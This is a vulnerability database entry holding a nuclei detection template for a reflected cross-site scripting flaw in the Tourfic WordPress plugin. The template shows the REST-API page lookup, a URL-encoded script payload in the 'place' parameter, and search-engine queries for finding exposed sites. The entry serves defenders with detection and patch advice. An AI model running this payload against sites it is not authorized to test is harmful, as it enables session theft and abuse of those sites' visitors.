Lucene search
K

WordPress Tourfic Plugin <= 2.11.7 - Cross-Site Scripting

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 12 Views

Tourfic WordPress plugin up to 2.11.7 has reflected XSS in the place parameter; update to 2.11.8.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-29137
19 Mar 202415:27
circl
CNNVD
WordPress Plugin Tourfic Cross-Site Scripting Vulnerability
19 Mar 202400:00
cnnvd
CVE
CVE-2024-29137
19 Mar 202413:44
cve
Cvelist
CVE-2024-29137 WordPress Tourfic plugin <= 2.11.7 - Reflected Cross Site Scripting (XSS) vulnerability
19 Mar 202413:44
cvelist
EUVD
EUVD-2024-26173
3 Oct 202520:07
euvd
NVD
CVE-2024-29137
19 Mar 202414:15
nvd
OSV
CVE-2024-29137
19 Mar 202414:15
osv
Patchstack
WordPress Tourfic Plugin <= 2.11.7 is vulnerable to Cross Site Scripting (XSS)
18 Mar 202400:00
patchstack
Positive Technologies
PT-2024-22756
19 Mar 202400:00
ptsecurity
RedhatCVE
CVE-2024-29137
5 Feb 202508:02
redhatcve
Rows per page
id: CVE-2024-29137

info:
  name: WordPress Tourfic Plugin <= 2.11.7 - Cross-Site Scripting
  author: Shivam Kamboj
  severity: high
  description: |
    The Tourfic plugin for WordPress is vulnerable to Reflected Cross-Site Scripting (XSS) in versions up to and including 2.11.7 due to insufficient input sanitization and output escaping in the 'place' parameter.
  impact: |
    Attackers can execute malicious scripts in users' browsers, potentially stealing cookies, session tokens, or performing actions on behalf of users.
  remediation: |
    Update to Tourfic version 2.11.8 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-29137
    - https://patchstack.com/database/vulnerability/tourfic/wordpress-tourfic-plugin-2-11-7-reflected-cross-site-scripting-xss-vulnerability
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tourfic/tourfic-2117-reflected-cross-site-scripting
    - https://wpscan.com/vulnerability/f93321c7-d4e3-470c-9fd9-8e65c2284c5d/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
    cvss-score: 7.1
    cve-id: CVE-2024-29137
    epss-score: 0.00622
    epss-percentile: 0.4548
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 2
    vendor: themefic
    product: tourfic
    framework: wordpress
    publicwww-query: "/wp-content/plugins/tourfic/"
    fofa-query: body="/wp-content/plugins/tourfic/"
  tags: cve,cve2024,wordpress,wp-plugin,xss,tourfic,unauth,vkev

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - '{{BaseURL}}/index.php?rest_route=/wp/v2/pages&per_page=100'

    extractors:
      - type: regex
        name: search_page_id
        group: 1
        regex:
          - '"slug":"tf-search"[^}]*"link":"[^"]*page_id=(\d+)"'
        internal: true

  - method: GET
    path:
      - '{{BaseURL}}/?page_id={{search_page_id}}&type=tf_hotel&place=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&adults=2&children=1&room=1'

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header, "text/html")'
          - 'contains(body, "><script>alert(document.domain)</script>")'
        condition: and
# digest: 4a0a0047304502207466953f7741b9811026b3f0c7e5d5b46bdac3100bfe8d90fbf785ba26fb07fd022100b7e0c0fab34eee0dcade3aa6494494d2bb63e85968ec8f08b837c420b2721244:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.16.1 - 7.1
EPSS0.00622
SSVC
12